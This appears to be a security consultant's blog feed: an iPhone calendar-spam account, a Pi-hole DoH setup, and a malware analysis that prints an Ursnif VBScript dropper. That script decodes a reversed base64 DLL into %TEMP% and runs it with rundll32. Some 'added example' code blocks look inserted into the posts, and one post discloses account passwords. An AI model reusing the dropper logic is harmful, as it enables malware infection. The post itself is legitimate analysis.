
/ˈpeːtər/, n • Security consultant at Atos • Dutch computer geek • Living together with Christina and father of 3 boys • Opinions are my own • He/him


Personal notes migrated to Joplin

1 min read

I was puzzling for a while over how to handle my personal notes, primarily in the terminal on the various systems, just being able to find certain procedures I use for upgrades which I can't recall from memory.

As an additional issue I still had my personal notes included in Microsoft Onenote and had the notes file stored on my owncloud instance.

So after browsing around I found Joplin, which covers most of my needs. The only thing is that Joplin works best if you know Markdown, which basically I do, but this could be a limitation for others.

So for now this is my personal notes solution having the Windows app installed on 3 workstations, my iPhone and on 2 unix systems. 

This week RFC 8996, titled "Deprecating TLS 1.0 and TLS 1.1", was published, giving software makers the go-ahead to remove support for these versions from their products. ISC hot take.

As most mornings I listened to the @SANS_ISC StormCast and did some reading up on Flowspec, which is an interesting BGP feature. I can really recommend listening to it - https://isc.sans.edu/podcast.html

Interesting attack vector I wasn't aware of. Abusing iPhone calendar subscriptions for fake antivirus advertisement - https://srcr.nl/2020/iphone-calendar-abuse

iPhone calendar abuse

2 min read

I actually fell for this attack, which uses the iPhone calendar to create notifications to get me to click on the link. I wasn't aware of this vector via the iPhone calendar before; I know it is done via Gmail's calendar.

Browsing around a little, I visited a site, got redirected to a web page and it gave me a pop-up to update my calendar. I was still lying in bed that morning, so I was not careful with touching the screen and tapped Allow 😒.

I don't use the iPhone internal calendar, so I was not too worried. I checked it briefly but didn't see anything right away, so I just parked it in my head as something to look into at a later stage.

Fast forward two days, and in the evening I get the following pop-up:

And I remember allowing the site to add stuff to my calendar. So I decide to check this a little and try to clean up the mess that was still pending. Looking at my calendar I see 4 reminders that evening and, as you can see in the screenshot below, 10 additional reminders.

I had just updated my iPhone to iOS 13.6, so all known exploits were fixed, and I assumed they would probably not waste a zero-day on this 😄.

So clicking the link to ofference.club I get the kind of normal scare screen and press the Close link.


And I get the pretty decently recreated page to install a VPN app; not sure how that is going to help me with the virus, but who cares 🤷

If you click 'verwijder alle virussen' (remove all viruses) or wait the 2 minutes, you get redirected to install the following app. I assume this is where the money is made: if the app gets installed with their affiliate code, they make some money. Interesting detail though: Savestock is not a VPN or antivirus app.


Recovering from this wasn't that big of a deal, although I needed to google how to remove a calendar subscription.

"Tap Settings > Accounts & Passwords > Subscribed Calendars" there you find the calendars you are subscribed to. In this case the "CLICK SUBSCRIBE..."

And then delete the account

Just watched this thorough and detailed video about the various features of . I'm looking forward to this so I signed up. If you also are interested in the game my referral link: https://ashesofcreation.com/r/TPGEMES35L5CC22D or the one in the video. - https://youtu.be/1s82xJnx1EY

"Each individual should feel proud and be authentic regardless of there sexual orientation or gender identity. Let's value the contribution of each individual and take pride in working for a company with diversity as a core value." /credit: @MHPietersen

I've just been called a show off by @ranlevi - https://malicious.life/episode/episode-81/ 😊

For anyone using @countercept's Snake malware storage zoo, I've built an interface scale to connect to @abuse_ch's MalwareBazaar - https://github.com/srcr/malwarebazaar-scale

Short VisualBasic #Ursnif dropper write-up

3 min read

Here is my first post: a short investigation into a malicious script that I came across.

The sample was posted to the URLhaus.abuse.ch list. This is probably part of a phishing mail which directs you to download the zip file and open it.

When you do this, the VisualBasic script inside the zip archive will typically be launched and the encoded payload will be executed on the system.

After unzipping we can have a first look at the .vbs script.

The malicious script contains:

  • A large string ending in "AAAAMAAQqVT". I'm already assuming a reversed PE executable: when you base64-encode the MZ header it results in something like TVxx.
  • Two arrays
  • A short code block to decode the arrays into something useful:

    for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr) : YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN))) : HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf : next : execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)

A little rewriting, and making it safer by echoing the output instead of executing it, results in the following VBS code:

' Walk both arrays in step; the original uses lbound of one and ubound of the other
for Value = lbound(ArrayOne) to ubound(ArrayTwo)
    ' Each character is the difference of the square roots of the paired values
    Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value)))
    ConcatResult = ConcatResult & Result
next
' Print the decoded script instead of handing it to execute()
WScript.Echo ConcatResult

Running this results in the following script.

on error resume next
set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")
Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url"
set oUrlLink = WshShell.CreateShortcut(Path)
oUrlLink.TargetPath = "http://adobe.com"
oUrlLink.Save(A)
if  (FSO.FileExists(Path))  Then
    WScript.Echo "Error!"
else
    xml = "Msxml2.DOMDocument"
    ws = "WScript.Shell"
    bin = "bin.base64"
    sa = "shell.application"
    bs = "base64"
    db = "Adodb.Stream"
    Set wshs = createobject(ws)
    Set sh = createobject(sa)
    filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll"
end if

Set oXML = CreateObject(xml)
Set oNode = oXML.CreateElement(bs)
oNode.dataType = bin
oNode.text = strreverse(code)

Set BinaryStream = CreateObject(db)
BinaryStream.Type = 1
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile filepath
sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0

The script places an Adobe.url in the temp folder pointing to http://adobe.com
and, as I already suspected, it does a string reverse on the code variable - strreverse(code).
Passing this through the base64 decoder results in a PE executable on the filesystem in your temp folder with the name SHCSdw.dll.

The dropped file SHCSdw.dll is an Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can believe this data. The sample is available on VirusTotal.
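To make the two tricks above reproducible offline, here is an added Python example (my own code, not from the original post or the sample): a mirror of the chr(sqr(a) - sqr(b)) array decoder, and the reversed-base64 check that looks for the MZ magic the way the large string hinted at. The arrays and the fake PE header are constructed test data; the encoder exists only to build them and is not part of the dropper.

```python
import base64
import binascii
import math

# Added example, not from the original post: a Python mirror of the two
# techniques seen in the dropper, written to study such samples offline.
# 1. The chr(sqr(a) - sqr(b)) array decoder.
# 2. The reversed-base64 check for an embedded PE (MZ) image.


def encode_pair_arrays(text, key_start=7):
    """Constructed encoder matching the dropper's scheme, used here only to
    build test data: each character c becomes the pair a=(c+k)^2, b=k^2 so
    that sqr(a) - sqr(b) == c. k varies per position to mimic the noise in
    the real arrays."""
    array_one, array_two = [], []
    for i, ch in enumerate(text):
        k = key_start + i
        array_one.append((ord(ch) + k) ** 2)
        array_two.append(k ** 2)
    return array_one, array_two


def decode_pair_arrays(array_one, array_two):
    """Mirror of the VBS loop: Result = chr(sqr(ArrayOne(i)) - sqr(ArrayTwo(i))).
    The original loops from lbound(ArrayOne) to ubound(ArrayTwo); a length
    mismatch there would be an out-of-range error, so reject it explicitly."""
    if len(array_one) != len(array_two):
        raise ValueError("array length mismatch")
    out = []
    for a, b in zip(array_one, array_two):
        code_point = round(math.sqrt(a) - math.sqrt(b))
        out.append(chr(code_point))
    return "".join(out)


def reversed_base64_is_pe(blob):
    """Reverse the blob (strreverse(code) in the dropper), base64-decode it
    and test for the MZ magic. Returns the decoded bytes on a hit, None
    otherwise (including when the text is not valid base64 at all)."""
    try:
        raw = base64.b64decode(blob[::-1], validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw if raw[:2] == b"MZ" else None


# Constructed sample: a fake 8-byte "PE" header (MZ magic plus a few bytes),
# base64 encoded and reversed the way the dropper stores it. The reversed
# text ends in ...AAAAMAAQqVT, the same tail the post observed in the string.
FAKE_PE_HEADER = b"MZ\x90\x00\x03\x00\x00\x00"
REVERSED_BLOB = base64.b64encode(FAKE_PE_HEADER).decode()[::-1]


def demo():
    """Run both checks on the constructed data and return the findings."""
    arrays = encode_pair_arrays("on error resume next")
    decoded_script = decode_pair_arrays(*arrays)
    pe_bytes = reversed_base64_is_pe(REVERSED_BLOB)
    return decoded_script, pe_bytes


if __name__ == "__main__":
    script, pe = demo()
    print("decoded first line:", script)
    print("reversed blob:", REVERSED_BLOB)
    print("PE detected:", pe is not None)
```

The reversed-base64 check is the quick triage step: if the reversed text decodes and starts with MZ, you have a dropped executable and can go straight to hashing it and looking it up, as done with SHCSdw.dll below.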

IOC's

File              Type                   sha256
dokument9055.zip  Zip archive data       bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c
dokument9055.vbs  VisualBasic script     98b3160c553c229cb9be77de3791398aed3cce79e7935d96db9e32bf353b9624
SHCSdw.dll        PE32 executable (DLL)  bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32

Great thread and dig through by @fs0c131y: In to the creators of the app used to report results during the - https://threadreaderapp.com/thread/1224628685808066565.html

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg

1 min read


Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers by Andy Greenberg
My rating: 5 of 5 stars


It came recommended in the Darknet Diaries Podcast ep 54: Notpetya by Jack Rhysider.
And as far as I'm concerned this is a must read for anyone working in Cybersecurity. It gives so much detail about the Russian government hacking techniques and motivations.
I already knew most of the separate attacks described in the book but getting the big picture how all these are related is an eye opener.


Woke up to @davemaasland on TV. Nice item, and indeed good to make the wider public aware of this. - https://nos.nl/artikel/2314365-laadpassen-elektrische-auto-s-zijn-moeiteloos-te-kopieren.html

must be underpinned by robust ethics. AI in is as much about what it should do, as what it can do. @ZeinaZakhour discusses the core elements of a security by design approach https://atos.net/en/blog/security-by-design-the-new-cyber-security-paradigm

Staggering numbers: from January to August 2019, around the world, there were more than 518,223 cases of stalkerware presence detected. - https://securelist.com/the-state-of-stalkerware-in-2019/93634

My @UbisoftUplay password was "2e0eTG180rCdigFh" but because you cannot paste it I changed it to "Ubisoft8" /cc @ubisoftsupport

DNS-over-HTTPS in the Pi-hole

1 min read

On the Raspberry Pi install the dnss package:

apt install dnss

Edit the socket settings to make it listen on port 5053; normally it listens on 53:

vi /etc/systemd/system/sockets.target.wants/dnss.socket

# Sockets for dnss.
#
# This lets dnss run unprivileged.
# We typically want one UDP and one TCP socket.

[Socket]
ListenDatagram=5053
ListenStream=5053

[Install]
WantedBy=sockets.target

And restart the socket. Because the Pi-hole is already running, starting dnss probably failed right after installation, since port 53 is in use:

systemctl restart dnss.socket

In the Pi-hole admin web interface under settings find the tab DNS and adjust the upstream DNS Server to the dnss installation

Pi-Hole - Upstream DNS Servers

And we're good to go. dnss uses by default dns.google.com.
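The same port change as a script, added here as an example and not part of the original post. Instead of editing the unit under sockets.target.wants (on Debian that path is a symlink to the packaged unit, which a package upgrade can overwrite), it writes a systemd drop-in override for dnss.socket. It assumes the Debian dnss package with its dnss.socket unit; the root-directory parameter is only there so the rendered file can be inspected in a scratch directory before touching /etc.

```shell
#!/bin/sh
# Added example, not from the original post: move dnss off port 53 with a
# systemd drop-in rather than editing the symlinked unit file.
# Assumes the Debian dnss package and its dnss.socket unit.
set -eu

# Render the override. The empty ListenDatagram=/ListenStream= lines are
# required: systemd list settings accumulate, so without the reset the
# socket would still bind port 53 as well and clash with the Pi-hole.
render_dnss_override() {
    port="$1"
    printf '%s\n' \
        '[Socket]' \
        'ListenDatagram=' \
        'ListenStream=' \
        "ListenDatagram=$port" \
        "ListenStream=$port"
}

# Write the drop-in below a root directory (empty = the real filesystem;
# pass a scratch directory to check the rendering first).
write_dnss_override() {
    port="$1"
    root="${2:-}"
    dir="$root/etc/systemd/system/dnss.socket.d"
    mkdir -p "$dir"
    render_dnss_override "$port" > "$dir/override.conf"
    printf '%s\n' "$dir/override.conf"
}

# Show the merged listen addresses so you can confirm only the new port is
# left after the override has been loaded.
show_effective_ports() {
    systemctl show dnss.socket -p Listen
}

# Apply on the Pi: write the drop-in, reload, restart, print what is bound.
apply_dnss_port() {
    port="$1"
    write_dnss_override "$port"
    systemctl daemon-reload
    systemctl restart dnss.socket
    show_effective_ports
    echo "Now set the Pi-hole custom upstream DNS to 127.0.0.1#$port"
}

# Only run when a port is passed, e.g.: sudo sh dnss-doh.sh 5053
if [ "$#" -gt 0 ]; then
    apply_dnss_port "$1"
fi
```

After the restart, `systemctl show dnss.socket -p Listen` should list only the 5053 entries; if port 53 still appears, the reset lines in the override are missing.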


Attending: Taking Security From Mediocre to Mighty With The MITRE ATT&CK Framework on Brighttalk - https://www.isc2.org/News-and-Events/Webinars/EMEA-Webinars?commid=360733&utm_campaign=Twitter&a...